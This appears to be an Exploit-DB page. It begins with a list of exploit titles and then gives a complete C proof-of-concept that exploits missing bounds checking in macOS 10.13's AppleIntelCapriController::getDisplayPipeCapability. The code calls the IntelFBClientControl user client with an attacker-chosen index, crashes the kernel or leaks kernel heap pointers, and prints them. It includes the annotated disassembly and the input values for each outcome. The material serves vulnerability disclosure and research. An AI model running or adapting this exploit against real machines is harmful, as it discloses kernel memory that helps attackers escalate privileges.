bfebc3fa5a
62 changes to exploits/shellcodes macOS 10.13 (17A365) - Kernel Memory Disclosure due to Lack of Bounds Checking in 'AppleIntelCapriController::getDisplayPipeCapability' Peercast < 0.1211 - Format String Trillian Pro < 2.01 - Design Error dbPowerAmp < 2.0/10.0 - Buffer Overflow PsychoStats < 2.2.4 Beta - Cross Site Scripting MongoDB 2.2.3 - nativeHelper.apply Remote Code Execution GitStack 2.3.10 - Unauthenticated Remote Code Execution Invision Power Top Site List < 2.0 Alpha 3 - SQL Injection (PoC) Invision Power Board (IP.Board) < 2.0 Alpha 3 - SQL Injection (PoC) Aardvark Topsites < 4.1.0 - Multiple Vulnerabilities DUWare Multiple Products - Multiple Vulnerabilities AutoRank PHP < 2.0.4 - SQL Injection (PoC) ASPapp Multiple Products - Multiple Vulnerabilities osCommerce < 2.2-MS2 - Multiple Vulnerabilities PostNuke < 0.726 Phoenix - Multiple Vulnerabilities MetaDot < 5.6.5.4b5 - Multiple Vulnerabilities phpGedView < 2.65 beta 5 - Multiple Vulnerabilities phpShop < 0.6.1-b - Multiple Vulnerabilities Invision Power Board (IP.Board) < 1.3 - SQL Injection phpBB < 2.0.6d - Cross Site Scripting Phorum < 5.0.3 Beta - Cross Site Scripting vBulletin < 3.0.0 RC4 - Cross Site Scripting Mambo < 4.5 - Multiple Vulnerabilities phpBB < 2.0.7a - Multiple Vulnerabilities Invision Power Top Site List < 1.1 RC 2 - SQL Injection Invision Gallery < 1.0.1 - SQL Injection PhotoPost < 4.6 - Multiple Vulnerabilities TikiWiki < 1.8.1 - Multiple Vulnerabilities phpBugTracker < 0.9.1 - Multiple Vulnerabilities OpenBB < 1.0.6 - Multiple Vulnerabilities PHPX < 3.26 - Multiple Vulnerabilities Invision Power Board (IP.Board) < 1.3.1 - Design Error HelpCenter Live! < 1.2.7 - Multiple Vulnerabilities LiveWorld Multiple Products - Cross Site Scripting WHM.AutoPilot < 2.4.6.5 - Multiple Vulnerabilities PHP-Calendar < 0.10.1 - Arbitrary File Inclusion PhotoPost Classifieds < 2.01 - Multiple Vulnerabilities ReviewPost < 2.84 - Multiple Vulnerabilities PhotoPost < 4.85 - Multiple Vulnerabilities AZBB < 1.0.07d - Multiple Vulnerabilities Invision Power Board (IP.Board) < 2.0.3 - Multiple Vulnerabilities Burning Board < 2.3.1 - SQL Injection XOOPS < 2.0.11 - Multiple Vulnerabilities PEAR XML_RPC < 1.3.0 - Remote Code Execution PHPXMLRPC < 1.1 - Remote Code Execution SquirrelMail < 1.4.5-RC1 - Arbitrary Variable Overwrite XPCOM - Race Condition ADOdb < 4.71 - Cross Site Scripting Geeklog < 1.4.0 - Multiple Vulnerabilities PEAR LiveUser < 0.16.8 - Arbitrary File Access Mambo < 4.5.3h - Multiple Vulnerabilities phpRPC < 0.7 - Remote Code Execution Gallery 2 < 2.0.2 - Multiple Vulnerabilities PHPLib < 7.4 - SQL Injection SquirrelMail < 1.4.7 - Arbitrary Variable Overwrite CubeCart < 3.0.12 - Multiple Vulnerabilities Claroline < 1.7.7 - Arbitrary File Inclusion X-Cart < 4.1.3 - Arbitrary Variable Overwrite Mambo < 4.5.4 - SQL Injection Synology Photostation < 6.7.2-3429 - Multiple Vulnerabilities D-Link DNS-343 ShareCenter < 1.05 - Command Injection D-Link DNS-325 ShareCenter < 1.05B03 - Multiple Vulnerabilities Linux/ARM - Reverse TCP (192.168.1.1:4444/TCP) Shell (/bin/sh) + Password (MyPasswd) + Null-Free Shellcode (156 bytes)
102 lines
No EOL
3.9 KiB
C
102 lines
No EOL
3.9 KiB
C
/*
|
|
AppleIntelCapriController::getDisplayPipeCapability reads an attacker-controlled dword value from a userclient structure
|
|
input buffer which it uses to index a small array of pointers to memory to copy back to userspace.
|
|
|
|
There is no bounds checking on the attacker supplied value allowing (with some heap grooming) the disclosure of arbitrary
|
|
kernel memory:
|
|
|
|
__text:000000000002ACE0 mov eax, [rbx] ; structure input buffer
|
|
__text:000000000002ACE2 mov rsi, [rdi+rax*8+0E48h] ; rax is controlled -> rsi read OOB
|
|
__text:000000000002ACEA cmp byte ptr [rsi+1DCh], 0 ; as long as this byte isn't NULL
|
|
__text:000000000002ACF1 jz short loc_2AD10
|
|
__text:000000000002ACF3 add rsi, 1E11h ; void * ; add this offset
|
|
__text:000000000002ACFA mov edx, 1D8h ; size_t
|
|
__text:000000000002ACFF mov rdi, r14 ; void *
|
|
__text:000000000002AD02 call _memcpy ; copy to structure output buffer, will be returned to userspace
|
|
|
|
Tested on MacOS 10.13 (17A365) on MacBookAir5,2
|
|
*/
|
|
|
|
// ianbeer
|
|
// build: clang -o capri_display_pipe capri_display_pipe.c -framework IOKit
|
|
|
|
#if 0
|
|
MacOS kernel memory disclosure due to lack of bounds checking in AppleIntelCapriController::getDisplayPipeCapability
|
|
|
|
AppleIntelCapriController::getDisplayPipeCapability reads an attacker-controlled dword value from a userclient structure
|
|
input buffer which it uses to index a small array of pointers to memory to copy back to userspace.
|
|
|
|
There is no bounds checking on the attacker supplied value allowing (with some heap grooming) the disclosure of arbitrary
|
|
kernel memory:
|
|
|
|
__text:000000000002ACE0 mov eax, [rbx] ; structure input buffer
|
|
__text:000000000002ACE2 mov rsi, [rdi+rax*8+0E48h] ; rax is controlled -> rsi read OOB
|
|
__text:000000000002ACEA cmp byte ptr [rsi+1DCh], 0 ; as long as this byte isn't NULL
|
|
__text:000000000002ACF1 jz short loc_2AD10
|
|
__text:000000000002ACF3 add rsi, 1E11h ; void * ; add this offset
|
|
__text:000000000002ACFA mov edx, 1D8h ; size_t
|
|
__text:000000000002ACFF mov rdi, r14 ; void *
|
|
__text:000000000002AD02 call _memcpy ; copy to structure output buffer, will be returned to userspace
|
|
|
|
Tested on MacOS 10.13 (17A365) on MacBookAir5,2
|
|
#endif
|
|
|
|
#include <stdio.h>
|
|
#include <stdlib.h>
|
|
#include <string.h>
|
|
|
|
#include <IOKit/IOKitLib.h>
|
|
|
|
int main(int argc, char** argv){
|
|
kern_return_t err;
|
|
|
|
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IntelFBClientControl"));
|
|
|
|
if (service == IO_OBJECT_NULL){
|
|
printf("unable to find service\n");
|
|
return 0;
|
|
}
|
|
|
|
io_connect_t conn = MACH_PORT_NULL;
|
|
err = IOServiceOpen(service, mach_task_self(), 0, &conn);
|
|
if (err != KERN_SUCCESS){
|
|
printf("unable to get user client connection\n");
|
|
return 0;
|
|
}
|
|
|
|
uint64_t inputScalar[16];
|
|
uint64_t inputScalarCnt = 0;
|
|
|
|
char inputStruct[4096];
|
|
size_t inputStructCnt = 8;
|
|
*(uint64_t*)inputStruct = 0x12345678; // crash
|
|
//*(uint64_t*)inputStruct = 0x37; // disclose kernel heap memory
|
|
|
|
|
|
uint64_t outputScalar[16];
|
|
uint32_t outputScalarCnt = 0;
|
|
|
|
char outputStruct[4096];
|
|
size_t outputStructCnt = 4096;
|
|
|
|
err = IOConnectCallMethod(
|
|
conn,
|
|
0x710,
|
|
inputScalar,
|
|
inputScalarCnt,
|
|
inputStruct,
|
|
inputStructCnt,
|
|
outputScalar,
|
|
&outputScalarCnt,
|
|
outputStruct,
|
|
&outputStructCnt);
|
|
|
|
if (outputStructCnt > 20) {
|
|
int n_leaked_ptrs = (outputStructCnt-7)/8;
|
|
uint64_t* ptrs = (uint64_t*) (outputStruct+7);
|
|
for (int i = 0; i < n_leaked_ptrs; i++) {
|
|
printf("%016llx\n", ptrs[i]);
|
|
}
|
|
}
|
|
return 0;
|
|
} |